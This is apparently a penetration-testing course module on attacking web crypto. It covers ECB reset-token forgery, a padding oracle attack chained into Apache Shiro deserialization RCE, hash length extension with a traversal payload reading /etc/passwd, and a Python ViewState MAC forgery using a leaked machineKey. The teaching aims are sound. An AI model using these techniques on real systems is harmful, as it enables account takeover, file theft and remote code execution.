Web Application

Penetration Testing
eXtreme

Attacking Crypto
S e c t i o n 0 1 | M o d u l e 1 2
© Caendra Inc. 2020
All Rights Reserved
Table of Contents

MODULE 12 | ATTACKING CRYPTO

12.1 Encryption Fundamentals 12.4 Hash Length Extension Attack

12.2 Insecure Password Reset 12.5 Leveraging machineKey

12.3 Padding Oracle Attack 12.6 Subverting HMAC in Node.js

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.2

Learning Objectives

By the end of this module, you should have a better

understanding of:

✓ Common inefficiencies in crypto implementations

✓ How to find and exploit weak crypto

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.3

 12.1

Encryption
Fundamentals

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.4

12.1.1 Cryptography

Cryptography is of paramount importance when it comes to

storing and passing information in today’s dynamic web
applications.

In this section, we’ll talk about exploiting insecure crypto

implementations used in web applications. But before
doing so, let’s cover some encryption fundamentals.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 5

12.1.2 Key Encryption Terms

Let’s start by explaining the terms below.

1. Encryption
2. Ciphers
3. ECB – Electronic Code Book
4. CBC – Cipher Block Chaining
5. Padding

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 6

12.1.2.1 Encryption

Encryption is defined as the transformation of plaintext into

ciphertext. Ciphertext should not be easily comprehended by
anyone except authorized parties.

• Symmetric encryption (also known as secret key

cryptography): When a single key is used between the
communication peers to encrypt and decrypt data
• Asymmetric encryption (also known as public key
cryptography): When a public and private key pair is used
between the communication peers to encrypt and decrypt data
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 7
12.1.2.2 Ciphers

Cipher is an algorithm for performing encryption or

decryption of data with series of well-defined procedures

• Stream Ciphers: When data are encrypted one by one

• Block Ciphers: When data are encrypted in blocks

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 8

12.1.2.3 Electronic Code Book (ECB)

• ECB is a mode of operation for a

block cipher
• The plaintext to be encrypted is
divided into blocks. Each block
will result in a corresponding
ciphertext block
• The same plaintext value will
always produce the same
ciphertext

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 9

12.1.2.4 Cipher Block Chaining (CBC)

• CBC is a mode of operation for a

block cipher
• Each block of plaintext is XORed
with the previous ciphertext block
before being encrypted
• An initialization vector (IV) is
used to make each data unique

https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 10

12.1.2.5 Padding

• In block cipher mode, encryption takes place in the aforementioned

fixed size blocks, and padding is used to ensure that the cleartext
data (of arbitrary size) exactly fit in one or multiple blocks of fixed
size input.
• Padding is composed of the number of missing bytes and added
into the plaintext. See an example below.

Image credits: https://twitter.com/beingsecure WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 11
12.1.3 Attacks Against Crypto
It is about time we start talking about identifying and exploiting insecure
crypto implementations. The attacks against crypto implementations can
be divided as follows.

Ciphertext-Only Attack (COA)

• The attacker has access to a set of ciphertext(s)
Chosen-Ciphertext Attack (CCA)
• The attacker can choose different ciphertexts to be decrypted and
obtain the corresponding plain text
Known Plaintext Attack (KPA)
• The attacker knows the plaintext and its encrypted version (ciphertext)
Chosen Plaintext Attack (CPA)
• The attacker can encrypt plaintexts of his choice
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 12
 12.2

Insecure Password
Reset

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.13

12.2.1 Known Plaintext Attack Scenario

The first attack scenario we will

cover is an insecure password
reset implementation (thanks to
NotSoSecure for the demo code
and application).

Under the hood, the user’s email

id is used and encrypted by the
application to generate a
password reset token. See the
encryption implementation on
your right (AES encryption in ECB
mode).
https://www.notsosecure.com/ WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 14
12.2.2 Exploitation

The aforementioned encryption implementation is

unfortunately insecure, since it generates the same
ciphertext for a given plaintext, not taking into account the
“location”.

The above means that if an attacker wants to takeover the

account [email protected], he can register email
addresses such as
[email protected] and
[email protected] and then
request for a password reset.

Due to the insecure encryption, the attacker will take the

common portion from the received tokens, which will be a
perfectly valid password reset token for
[email protected] and successfully reset the
targeted account’s password.

Even if you are not aware of the encryption being employed

under the hood, make sure you try this method during your
penetration tests.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 15

12.2.2 Exploitation

As you may have already guessed we have just performed a

Known Plaintext Attack (KPA) since we were in the position
of knowing both the plaintext and the ciphertext.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 16

 12.3

Padding Oracle
Attack

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.17

12.3.1 What is a Padding Oracle?
In Web Application Penetration Testing, an Oracle is any
application functionality, error message or behavior that can
reveal valuable information (as a response to different input) .

When it comes to attacks against crypto, one of the most known

Oracle-based attacks is the Padding Oracle attack, that leverages
proper and improper padding as a means of gaining application
information.

Specifically, Padding Oracle attacks target CBC-mode decryption

functions operating with PKCS7-mode padding. A Padding Oracle
can reveal if the padding is correct for a given ciphertext.
https://robertheaton.com/2013/07/29/padding-oracle-attack/ WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 18
http://seffyvon.github.io/cryptography/2014/08/20/CBC-Padding-Oracle-Attacks/
12.3.1 What is a Padding Oracle?

Another resource on practical Padding Oracle attacks can

be found below.
http://netifera.com/research/poet/PaddingOracleBHEU10.
pdf

http://netifera.com/research/poet/PaddingOracleBHEU10.pdf WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 19

12.3.1 What is a Padding Oracle?
At this point we should also mention Intermediate Values.
Intermediate values are the output of the block cipher during the
block cipher process.

Essentially, they can be seen as the state of a ciphertext block

after decryption and before the XOR operation with the previous
ciphertext block.

Once intermediate bytes are found, deciphering the plaintext of

the corresponding ciphertext is easy.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 20
12.3.2 Padding Oracle Attack Scenario
Let’s now go through a Padding Oracle attack scenario against
Apache Shiro.

Apache Shiro is a powerful and easy-to-use Java security

framework that has functions to perform authentication,
authorization, password, and session management.

Older Shiro versions suffered from a Padding Oracle vulnerability,

that when chained with a another deserialization-based
vulnerability could result in remote code execution.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 21
12.3.2 Padding Oracle Attack Scenario
Specifically, Shiro used the AES-128-CBC mode to
encrypt cookies enabling Padding Oracle attacks.
(The RememberMe cookie is of interest in this case)

Shiro also used CookieRememberMeManager by

default, which serialized, encrypted, and encoded
the user's identity for later retrieval. See the
flowchart on your right.
---------------------------------------------------------------------
The Padding Oracle vulnerability can result in an
attacker creating a malicious object, serializing it,
encoding it and finally sending it as a cookie. Shiro
will then decode and deserialize it.

Unfortunately, the deserialization implementation of

the affected Shiro versions was also insecure. By
chaining the Padding Oracle vulnerability with the
deserialization-based one, remote code execution
was possible.

https://shiro.apache.org/static/1.2.2/apidocs/org/apache/shiro/web/mgt/CookieRe WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 22

memberMeManager.html
12.3.2 Padding Oracle Attack Scenario
The Padding Oracle part has been quite nicely explained (in a simplified manner) on the below post.
https://www.anquanke.com/post/id/192819

“Select a string, P, that you want to generate ciphertext, C, for.

Pad the string to be a multiple of the blocksize, using appropriate padding, then split it into blocks numbered
from 1 to N.
Generate a block of random data (CN – ultimately, the final block of ciphertext).
For each block of plaintext, starting with the last one…
• Create a two-block string of ciphertext, C’, by combining an empty block (00000…) with the most recently generated
ciphertext block (Cn+1) (or the random one if it’s the first round)
• Change the last byte of the empty block until the padding errors go away, then use math to set the last byte to 2 and
change the second-last byte till it works. Then change the last two bytes to 3 and figure out the third-last, fourth-last,
etc.
• After determining the full block, XOR it with the plaintext block Pn to create Cn
• Repeat the above process for each block (prepend an empty block to the new ciphertext block, calculate it, etc.)

To put that in English: each block of ciphertext decrypts to an unknown value, then is XOR’d with the previous
block of ciphertext. By carefully selecting the previous block, we can control what the next block decrypts to.
Even if the next block decrypts to a bunch of garbage, it’s still being XOR’d to a value that we control, and can
therefore be set to anything we want.”

https://www.anquanke.com/post/id/192819 WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 23

12.3.2 Padding Oracle Attack Scenario
To demonstrate this attack, we have set up our own vulnerable environment using Apache Shiro
1.4.1 + tomcat:8-jre8.

First:
git clone https://github.com/apache/shiro.git
cd shiro
git checkout shiro-root-1.4.1
mvn install

Then,
cd samples/web
mvn install

Finally copy the samples-web-1.4.1.war package (samples / target /) obtained after compilation
to the Tomcat webapps directory, and start tomcat.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 24

12.3.2 Padding Oracle Attack Scenario
The attack flow is as follows:
1. First, we logged in to the website (sample credentials are
provided in the log in page), checked “Remember Me”
and obtained a legitimate cookie using Burp.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 25

12.3.2 Padding Oracle Attack Scenario

2. Then, we used ysoserial to create our serialized payload

(that simply creates a file named success inside the
/tmp directory) and save it to a file called payload.class.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 26

12.3.2 Padding Oracle Attack Scenario
3. Next, we downloaded the publicly available exploit
(https://github.com/wuppp/shiro_rce_exp/blob/master/
shiro_exp.py) and used the captured rememberMe
cookie as a prefix for the Padding Oracle attack, as
follows.

https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 27

12.3.2 Padding Oracle Attack Scenario
4. After a couple of hours the exploit script provided us
with a valid (properly encrypted due to the Padding
Oracle attack) cookie containing our payload. This
cookie will be deserialized by the vulnerable server.

https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 28

12.3.2 Padding Oracle Attack Scenario
5. Finally, using Burp’s Repeater, we issued a request with our
crafted cookie. The result, was remote code execution. The
Padding Oracle attack enabled the attack. Without it, crafting
a properly encrypted cookie would not be possible.

https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 29

12.3 Padding Oracle Attack

For completeness’ shake we should mention that Padding

Oracle attacks are Chosen-Ciphertext Attacks (CCA).

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 30

 12.4

Hash Length
Extension Attack

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.31

12.4.1 Hash Length Extension Attack
Fundamentals

There are web applications that prepend a secret value to

data, hash this value with a flawed algorithm and provides
the user with both the data and the hash, but not the secret.

On the other part of the communication, the server relies on

the secret for data validation purposes.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 32

12.4.1 Hash Length Extension Attack
Fundamentals
An attacker that doesn’t know the value of the secret can still
generate a valid hash for {secret || data ||
attacker_controlled_data}. This is possible because an attacker
can pick up from where the hashing algorithm left off. The state
that is needed in order to continue a hash is included in the
output of the majority of the hashing algorithms. By loading that
state into an appropriate hash structure, we can continue
hashing.

In simpler terms, an attacker can calculate a valid hash for a

message without knowing the value of the secret. He can do that
by just guessing its length. Hashes are calculated in blocks and
the hash of one block is the state for the next block.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 33
12.4.1 Hash Length Extension Attack
Fundamentals
The above attacker actions are known as a Hash Length Extension
attack. Let’s see an example.

Request:
stock_quantity=20&price=1000
Hash:
[secretpass|stock_quantity=20&price=1000|padding] => Hash1/State1
Final Request:
stock_quantity=20&price=1000&hash=Hash1

If an attacker manages to identify the length of padding, he will have all

the info needed to calculate a new hash.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 34
12.4.1 Hash Length Extension Attack
Fundamentals

Attack Hash:
[secretpass|stock_quantity=20&price=1000|padding|&price=100]

Attack Hash:
[State1|&price=10] => Hash2/State2

Final Request:
stock_quantity=20&price=1000+padding&price=100&hash=Hash2

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 35

12.4.1 Hash Length Extension Attack
Fundamentals

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 36

12.4.1 Hash Length Extension Attack
Fundamentals

One of the best resources to dive into the calculations

required during Hash Length Extension Attacks is the
below.
https://blog.skullsecurity.org/2012/everything-you-need-to-
know-about-hash-length-extension-attacks

https://blog.skullsecurity.org/2012/everything-you-need-to- WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 37

know-about-hash-length-extension-attacks
12.4.2 Hash Length Extension Attack
Scenario

Let’s now go through a Hash Length Extension attack

scenario against the vulnerable CryptOMG application.

Challenge 5 is what we need to witness how a Hash Length

Extension can be performed.

https://github.com/SpiderLabs/CryptOMG WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 38

12.4.2 Hash Length Extension Attack
Scenario

By navigating to Challenge 5, we come across the below.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 39

12.4.2 Hash Length Extension Attack
Scenario
Clicking on “hello”, “test”
etc. and seeing both the
responses and the
requests makes us thing
that the application “prints”
the contents of local files.
By picking various
algorithms we can also
identify the possible
parameters.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 40
12.4.2 Hash Length Extension Attack
Scenario
Something else that we should notice, is that
regardless of the size of the file name input,
the output is the same size.

The above suggests that a hashing algorithm

may be in use. This algorithm could be SHA1
(due to the fixed output length), but if we try
(echo -n pictures | sha1sum) locally, the
SHA1 sum we get is different from the one
shown by the application.

We are most probably against Message

Authentication Code, the application must be
adding something to the hash apart from the
file name. We remind you that during MAC a
secret value is appended and the outcome is
hashed.

Luckily, such an implementation is vulnerable

to Hash Length Extension Attacks!

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 41

12.4.2 Hash Length Extension Attack
Scenario
Let’s try reading the contents of
/etc/passwd by executing a Hash Length
Extension Attack.
./hash_extender -f sha1 --
As previously covered, we don’t need to
know the secret value being used. We only data 'test' -s
need to successfully guess the length of dd03bd22af3a4a0253a66621bc
the secret. b80631556b100e --append
'../../../../../../../../.
For this task we can use hash_extender as ./etc/passwd' --secret-
follows. min=10 --secret-max=40 --
• The specify a known hash value out-data-format=html --
• The specify an estimation regarding the table > payloads.out
secret’s length (between 10 and 40
bytes)
• We will have to experiment with the
amount of ../../ to be used

https://github.com/iagox86/hash_extender WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 42

12.4.2 Hash Length Extension Attack
Scenario
Let’s now use hash_extender’s output (payloads.out) inside Burp’s
Intruder, in order to see if our guesses were successful.
We will follow a Sniper approach, as follows.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 43

12.4.2 Hash Length Extension Attack
Scenario

Eventually, we are able

to see the content of
/etc/passwd by means
of a Hash Length
Extension attack!

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 44

 12.5

Leveraging
machineKey

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.45

 12.5.1 The importance of machineKey
The Machine Key, is the cardinal feature that is used to
specify encryption settings for application services, such as
view state, forms authentication and roles in a system.

Machine Key contains a set of fields like validation key,

decryption key and so on where unique keys are to be
entered. Specifying a machine key looks as follows.

https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110) WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 46

 12.5.1 The importance of machineKey

The attributes and

elements of a machine key
can be seen on your right.

https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110) WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 47

12.5.2 Leveraging a leaked machineKey for
RCE
Suppose we are pentesting a .NET
application (residing at
192.168.227.135).

1. The application offers file

uploading functionality (the "aspx",
".config", ".ashx", ".asmx", ".aspq",
".axd", ".cshtm", ".cshtml", ".rem",
".soap", ".vbhtm", ".vbhtml", ".asa",
".asp" and ".cer" extensions are
blacklisted)
2. Validation of viewstate MAC is
performed (this prevents
deserialization exploitation without
knowing the cryptographic key -
machineKey)

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 48

12.5.2 Leveraging a leaked machineKey for
RCE

At this point, our only chance of bypassing authorization in

general and achieving high impact exploitation, is by finding
the machine key.
The vast majority of extensions that can help us are
unfortunately black-listed. That being said, the Server Side
Attacks module includes nice trick that can help us move
further in this situation, Server Side Include.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 49

12.5.2 Leveraging a leaked machineKey for
RCE

We can try uploading the following, in attempt to leak the

machine key.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 50

12.5.2 Leveraging a leaked machineKey for
RCE

Thankfully, our attempt was successful. We got access to

the web.config file (we used View Source Code to retrieve
its contents).

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 51

12.5.2 Leveraging a leaked machineKey for
RCE
Now, the last obstacle to bypass. We need to figure out how the MAC
generated and verified. To answer this we will need to dig into the below.
https://referencesource.microsoft.com/#system.web/UI/ObjectStateForm
atter.cs (Focus on lines 756-812)
https://referencesource.microsoft.com/#System.Web/Configuration/Mach
ineKeySection.cs (Focus on lines 786-818 , 847-866 and 1211-1230)

If you read the above, you will conclude to the below logic (pseudocode).
MAC_HASH = MD5(serialized_data_binary + validation_key +
0x00000000 )
VIEWSTATE = Base64_Encode(serialized_data_binary + MAC_HASH)

https://referencesource.microsoft.com/#system.web/UI/ObjectStateFormatter.cs
https://referencesource.microsoft.com/#System.Web/Configuration/MachineKeySection.cs
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 52
12.5.2 Leveraging a leaked machineKey for
RCE

For the exploitation

part, we will need
ysoserial.net and to
implement the MAC-
related logic of the
previous slide.

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 53

 12.5.2 Leveraging a leaked machineKey for
RCE
#!/usr/bin/env python3
import hashlib
import base64

For the exploitation serialized_data = '{the output of ysoserial.net goes here}'

payload = base64.b64decode(serialized_data)

part, we will need # Get machine key by uploading .shtml file (Server Side Include)
validation_key = bytes.fromhex('b07b0f97365416288cf0247cffdf135d25f6be87')

ysoserial.net and to '''

MAC_Hash = MD5(serialized_data_binary + validation_key + 0x00000000 )

implement the MAC- Simple stack trace to get MAC Hash:

System.Web.UI.ObjectStateFormatter.Serialize(object stateGraph, Purpose purpose)
MachineKeySection.GetEncodedData(byte[] buf, byte[] modifier, int start, ref int

related logic of the

length)
MachineKeySection.HashData(byte[] buf, byte[] modifier, int start, int length)
HashDataUsingNonKeyedAlgorithm(HashAlgorithm hashAlgo, byte[] buf, byte[]
modifier, int start, int length, byte[] validationKey)

previous slide. int hashSize);

'''
UnsafeNativeMethods.GetSHA1Hash(byte[] data, int dataSize, byte[] hash,

mac = hashlib.md5(payload + validation_key + b'\x00\x00\x00\x00').digest()

payload = base64.b64encode(payload + mac).decode()
print(payload)

Credits to [email protected] for the exploit WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 54
12.5.2 Leveraging a leaked machineKey for
RCE

Remote code
execution was
achieved!

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 55

12.5.2 Leveraging a leaked machineKey for
RCE

In this case, we didn’t attack crypto per se. Instead we

leveraged the SSI feature of the underlying server to leak
the cryptographic key.

Implementing strong crypto is important, but protecting the

cryptographic key is of equal importance!

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 56

 12.6

Subverting HMAC
in Node.js

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.57

 12.6.1 Subverting HMAC in Node.js
Scenario

At the end of the course we will also present you with an

example where HMAC can be subverted through Remote
Memory Disclosure in Node.js.

The source code of the vulnerable application will be

provided as well, so that you can try the attack locally.

https://en.wikipedia.org/wiki/HMAC WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 58

References

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.59

 References
Block cipher mode of operation
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation

Not So Secure
https://www.notsosecure.com/

The Padding Oracle Attack

https://robertheaton.com/2013/07/29/padding-oracle-attack/

CBC Padding Oracle Attacks

http://seffyvon.github.io/cryptography/2014/08/20/CBC-Padding-Oracle-Attacks/

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.60

 References
Practical Padding Oracle Attacks
http://netifera.com/research/poet/PaddingOracleBHEU10.pdf

Class CookieRememberMeManager
https://shiro.apache.org/static/1.2.2/apidocs/org/apache/shiro/web/mgt/CookieRemember
MeManager.html

Shiro RCE again（Padding Oracle Attack）

https://www.anquanke.com/post/id/192819

wuppp/shiro_rce_exp
https://github.com/wuppp/shiro_rce_exp/blob/master/shiro_exp.py

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.61

 References
Everything you need to know about hash length extension attacks
https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-
attacks

SpiderLabs/CryptOMG
https://github.com/SpiderLabs/CryptOMG

iagox86/hash_extender
https://github.com/iagox86/hash_extender

machineKey Element (ASP.NET Settings Schema)

https://msdn.microsoft.com/en-us/data/w8h3skw9(v=vs.110)

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.62

 References
ObjectStateFormatter.cs
https://referencesource.microsoft.com/#system.web/UI/ObjectStateFormatter.cs

MachineKeySection.cs
https://referencesource.microsoft.com/#System.Web/Configuration/MachineKeySection.cs

HMAC
https://en.wikipedia.org/wiki/HMAC

WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.63

 Labs
Padding Oracle Attack
In this lab, students will have the opportunity to perform a padding
oracle attack against a vulnerable application.

*Labs are only available in Full or Elite Editions of the course. To access, go to the course in your
members area and click the labs drop-down in the appropriate module line or to the virtual labs
tabs on the left navigation. To UPGRADE, click LINK.
WAPTXv2: Section 01, Module 12 - Caendra Inc. © 2020 | p.64